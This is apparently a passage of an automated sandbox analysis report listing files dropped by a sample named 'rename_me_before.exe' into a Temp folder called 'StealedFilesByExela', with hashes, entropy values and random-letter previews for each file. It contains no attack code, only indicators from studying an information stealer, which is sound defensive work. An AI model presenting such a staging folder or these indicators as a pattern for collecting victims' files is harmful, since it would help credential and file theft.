                                                                                                                                                                                                                                                          Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\VLZDGUKUTZ\KZWFNRXYKI.jpg

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.694982189683734
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                                                                                                                                                                          MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                                                                                                                                                                          SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                                                                                                                                                                          SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                                                                                                                                                                          SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\VLZDGUKUTZ\NIKHQAIQAU.png

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.690394987545919
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:x8Xtqp+Wamt5Tlx/0lL5fswH7s9cBus1XuWzv:+tNsfMswbVb+WD
                                                                                                                                                                                                                                                          MD5:CA901F8E74EB7955CF06A00BD424C0C2
                                                                                                                                                                                                                                                          SHA1:0876F92A018E8AB57F666FBB048B1CD028607A38
                                                                                                                                                                                                                                                          SHA-256:6DAB1DF82EDD11EEF4FD3B81E692BF065731935C03D4AAEB4493612188DD1D16
                                                                                                                                                                                                                                                          SHA-512:7363E62B6FB08E96BD561FA00A05C7A88C0C20943FC3FB9CD505C77CCB40C549F8943DDFCA69532F6544E9CC929EB5786C488F3D7E8F1AB0F05C3EA10E4EA0B2
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:NIKHQAIQAUYLAGKSNVEIEFIHRXSBOKMMEGWDWAKSEZEDBXXYJJOUSSENRJICLDBYWKJEUKRIBTNODZEVLZHOZSPIROLEDDZIVDLRTCVHZIXTARRYNQXDSJTZFOOYHUCROZUVPHMDRIWZWYNOATHQMKGZMPPIBYIAXUSGLYFPQTHUARHNEBTECYTUUCXJOESOPPKVXGBHXGPHIYJEJAYBFOVPMDVWEZNFBQJKZAWGCIWNFBSDPSSBBQTNYDJVQTTPUWPOOTVYKITOESDZWHOTFCZIQUYASDBGWAPMXAFIGQFPGWTRNBMHCXAZNMKIOSHYBMTSDERCDBFQSLEBTIGMCRUGZJZQAMYIFXIHLBUBWXCKIQTVQNMYMUYZWTTRQAVEAQFTTDTEFYTIXVPFUZALHHYLJHLNOFTPHODDWSFLBPCVKNDNFYPRHRVBHZSKKAJYBRTRWEHCIAZYAWYXGIRJSURFADGDZBTKMLEAYICWBYEAKNBIIDMQKZIXOLIQHETRIJJOSQDVZXKTZOMXOXGKIEJJNUHMCNVBNTYVETDBZHKYQLQYJBSUUNGMIURLIIINJAVXYNHTVSYTVBSAGNGQGUYADHTCDXNDKQFKCMHFRLWQZMSHDZEBEGPOSOPFUUHIVYBVXTLHFYHMHALQHNIUKMTKRBYZDOEALSNTXJRYMEETOQRISFEOVJSBVNMZFHXIDWOPIZKHISVTXVHAUPHEUOQLFVPNKREKEFDTLOWUVDKPDDCBKKSSGLLJSGVCAKVVFFKUKYVELNQTKZZRSDNEKDHUGDQWFBGFQMTINSXDOXPQOPZWHRDBBIZNGWLXSHCGVIBTIQEUTFYRIYKHRANDXVFREQPDFPRAKAFCQSRGTEIQGEAVDTJRESPBHYVTTLHWYQSKOZIBJZRSUJETZFCGMBHNYUSWWAENDXQUJFMLWZXGNLDFLSRZJBBJCPWKHFZXEVBDCLKULDSDXUFVEWFBMUMFQQONCJFFBARKNAVJ

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\VLZDGUKUTZ\NWTVCDUMOB.pdf

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.696250160603532
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
                                                                                                                                                                                                                                                          MD5:2B6A90B7D410E3A4E2B32C90D816B4FE
                                                                                                                                                                                                                                                          SHA1:B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
                                                                                                                                                                                                                                                          SHA-256:D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
                                                                                                                                                                                                                                                          SHA-512:03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\VLZDGUKUTZ\VLZDGUKUTZ.docx

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.701757898321461
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                                                                                                                                                                                          MD5:520219000D5681B63804A2D138617B27
                                                                                                                                                                                                                                                          SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                                                                                                                                                                                          SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                                                                                                                                                                          SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\XZXHAVGRAG\DVWHKMNFNN.jpg

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.694985340190863
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
                                                                                                                                                                                                                                                          MD5:C9386BC43BF8FA274422EB8AC6BAE1A9
                                                                                                                                                                                                                                                          SHA1:2CBDE59ADA19F0389A4C482667EC370D68F51049
                                                                                                                                                                                                                                                          SHA-256:F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
                                                                                                                                                                                                                                                          SHA-512:7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\XZXHAVGRAG\KATAXZVCPS.pdf

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.699548026888946
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                                                                                                                                          MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                                                                                                                                          SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                                                                                                                                          SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                                                                                                                                          SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\XZXHAVGRAG\KZWFNRXYKI.mp3

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.694982189683734
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                                                                                                                                                                          MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                                                                                                                                                                          SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                                                                                                                                                                          SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                                                                                                                                                                          SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\XZXHAVGRAG\NWTVCDUMOB.png

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.696250160603532
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
                                                                                                                                                                                                                                                          MD5:2B6A90B7D410E3A4E2B32C90D816B4FE
                                                                                                                                                                                                                                                          SHA1:B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
                                                                                                                                                                                                                                                          SHA-256:D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
                                                                                                                                                                                                                                                          SHA-512:03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\XZXHAVGRAG\VLZDGUKUTZ.xlsx

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.701757898321461
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                                                                                                                                                                                          MD5:520219000D5681B63804A2D138617B27
                                                                                                                                                                                                                                                          SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                                                                                                                                                                                          SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                                                                                                                                                                          SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                                                                                                                                                                          Malicious:false
